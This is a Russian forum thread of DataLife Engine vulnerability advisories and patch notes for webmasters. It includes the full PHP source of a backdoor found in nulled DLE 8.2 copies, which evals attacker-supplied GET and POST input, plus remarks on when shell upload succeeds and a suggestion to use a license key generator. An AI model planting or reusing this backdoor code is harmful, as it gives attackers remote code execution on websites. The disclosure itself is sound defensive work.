![]()  | 
 
         
           |  
		
			
  | 
||||||||
| Инструкции, модификации и статьи для DLE Сборник инструкции, модов и статей по движку DataLife Engine | 
![]()  | 
	
	
| 
		 | 
	Опции темы | Поиск в этой теме | 
| 
			
			 | 
		#1 | |||
| 
			 Коварный тип 
			![]() 
  | 
	
	
	
		
		
			
			 Я думаю что вопрос безопасности в скрипте DLE довольно актуален, т.к. движок имеет очень широкое распространение. Тема создана для вэб -мастеров, а не для засрацев, которые используют чужие ошибки. 
		
		
		
	 | 
|||
	
		
		
		
		
			 
		
		
		
		
		
		
			
		
		
		
	 | 
||||
| Cказали cпасибо: | 
| 
			
			 | 
		#2 | ||||
| 
			 Коварный тип 
			![]() 
  | 
	
	
	
		
		
			
			 Уязвимость DataLife Engine 8.2 
		
		
		
			Проблема: Недостаточная фильтрация входящих данных в модуле восстановления пароля. Степень опасности: Очень высокая Злоумышленник может получить логин и пароль через модуль восстановления пароля. Как получают пароль: 
 Для решения проблемы администраторам рекомендуется обновить скрипт до 8.3. Следует так же учесть что в версии 8.3 изменяются некоторые шаблоны. Все изменения в удобном виде можно просмотреть на официальном сайте ВОТ ТУТ. Для тех кто не хочет обновлять версию скрипта официальный производитель предлагает скачать патч. Скачать его можно ВОТ ТУТ или из вложения к этому сообщению.  | 
||||
	
		
		
		
		
			 
		
		
		
		
		
		
			
		
		
		
	 | 
|||||
| 
			
			 | 
		#3 | |||
| 
			 Web Master 
			![]() 
  | 
	
	
	
		
		
			
			 DLE 8.2 нулл от мид-тим весь в дырках..  
		
		
		
			1) Проблема: Недостаточная фильтрация входящих данных в модуле восстановления пароля. Ошибка в версии: только 8.2, версии ниже 8.2, а также актуальная версия 8.3 данной уязвимости не подвержены Степень опасности: Очень высокая Замените файл => dle82_path.zip 2) На днях появилась информация, что нуленные движки (скачанные c dle.in.ua, с других хз) dle8.2 содержат бэкдор в файле engine/ajax/updates.php eval() через $_POST. Код: 
	if($_GET['wert']==''){ 
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng'; 
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset']; 
@header("HTTP/1.0 200 OK"); 
@header("HTTP/1.1 200 OK"); 
@header("Cache-Control: no-cache, must-revalidate, max-age=0"); 
@header("Expires: 0"); 
@header("Pragma: no-cache"); 
@header("Content-type: text/css; charset=".$config['charset']); 
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']); 
if (!strlen($data)) echo $lang['no_update']; else echo $data; 
}else{ 
$file=(ROOT_DIR."/engine/classes/mysql.class.php"); 
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";} 
$file=(ROOT_DIR."/engine/data/dbconfig.php"); 
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";} 
$file=(ROOT_DIR."/engine/data/config.php"); 
if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";} 
eval(base64_decode($_GET['user_id'])); 
echo <<<HTML 
<HTML><body><form action="" method="post"> 
<center><textarea name="text" rows="10" cols="100"></textarea> 
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML> 
HTML; 
if($_POST['text']!=''){eval(stripcslashes($_POST['text'])); 
}}
 | 
|||
	
		
		
		
		
			 
		
		
		
		
		
		
			
		
		
		
	 | 
||||
| 
			
			 | 
		#4 | ||||
| 
			 Fedoraвод 
			![]() 
  | 
	
	
	
		
		
			
			 Эх серега, такую дырку спалил, яж те по секрету, а ты всему свету (шутка конечно) 
		
		
		
	Но есть у меня еще парочка секретов, так что, не советую серьёзные проекты хостить на дле, уж слишком много в них дырок. Serberg: Да уж, секрет ))) Просто внимания на эту писанину не обратил, пока не увидел что у меня та же ботва ). Естати, вот еще набор уязвимостей: 
  | 
||||
| 
		
		
		
		
		
		
		
			 Последний раз редактировалось Serberg; 16.11.2009 в 16:26..  | 
|||||
	
		
		
		
		
			 
		
		
		
		
		
		
			
		
		
		
	 | 
|||||
| Cказали cпасибо: | 
| 
			
			 | 
		#5 | |||
| 
			 .:V.I.P.:. 
			![]() 
  | 
	
	
	
		
		
			
			 Как вариант взять лицензионный скрипт DLE, мне дал его один знакомый. А ключ с генерируете генератором ключей. 
		
		
		
	![]() ![]() ![]() Скачать  | 
|||
| 
		
		
		
		
		
		
		
			 Последний раз редактировалось Serberg; 16.11.2009 в 16:30..  | 
||||
	
		
		
		
		
			 
		
		
		
		
		
		
			
		
		
		
	 | 
||||
| Cказали cпасибо: | 
| 
			
			 | 
		#6 | |||
| 
			 Новичок 
			![]() 
  | 
	
	
	
		
		
			
			 Даже если "плохому дяде" удастся получить доступ к админке, шелл залить не получится, т.к. в папке загрузки файлов лежит .htaccess который не даёт работать php(и не только). Шелл получится залить если установлен DLE Forum. Это так, для заметки. 
		
		
		
	 | 
|||
	
		
		
		
		
			 
		
		
		
		
		
		
			
		
		
		
	 | 
||||
| Cказали cпасибо: | 
| 
			
			 | 
		#7 | |||
| 
			 ::.V.I.P.:: 
			![]() 
  | 
	
	
	
		
		
			
			 Недостаточная фильтрация входящих данных 
		
		
		
	Ошибка в версии: 9.0 и все более ранние версии Степень опасности: Высокая Для исправления откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите: PHP код:  
	
			
	PHP код:  
	
			
	PHP код:  
	
			
	PHP код:  
	
			
	Источник: dle-news.ru  | 
|||
| 
		
		
		
		
			 Последний раз редактировалось Serberg; 16.02.2011 в 19:44..  | 
||||
	
		
		
		
		
			 
		
		
		
		
		
		
			
		
		
		
	 | 
||||
| 
			
			 | 
		#8 | |||
| 
			 Коварный тип 
			![]() 
  | 
	
	
	
		
		
			
			 Недостаточная фильтрация входящих данных 
		
		
		
	Проблема: Пользователю которому разрешена загрузка файлов на сервер (не картинок), может выйти за пределы разрешенной папки загрузки, а если он имеет администраторский аккаунт на сайте, то и повредить данные скрипта. Ошибка в версии: 7.x - 8.5 Степень опасности: Средняя (Высокая при наличии администраторского аккаунта на сайте) Для исправления откройте файл engine/inc/files.php и найдите: PHP код:  
	
			
	PHP код:  
	
			
	PHP код:  
	
			
	PHP код:  
	
			
	 | 
|||
	
		
		
		
		
			 
		
		
		
		
		
		
			
		
		
		
	 | 
||||
![]()  | 
	
	
| Метки | 
| shell dle, дыры в dle, уязвимости | 
| Опции темы | Поиск в этой теме | 
		
  | 
	
		
  | 
			 
			Похожие темы
		 | 
	||||
| Тема | Автор | Раздел | Ответов | Последнее сообщение | 
| Уязвимости форумов Vbulletin | shadowvlad | vBulletin 3.х | 2 | 26.02.2009 14:17 |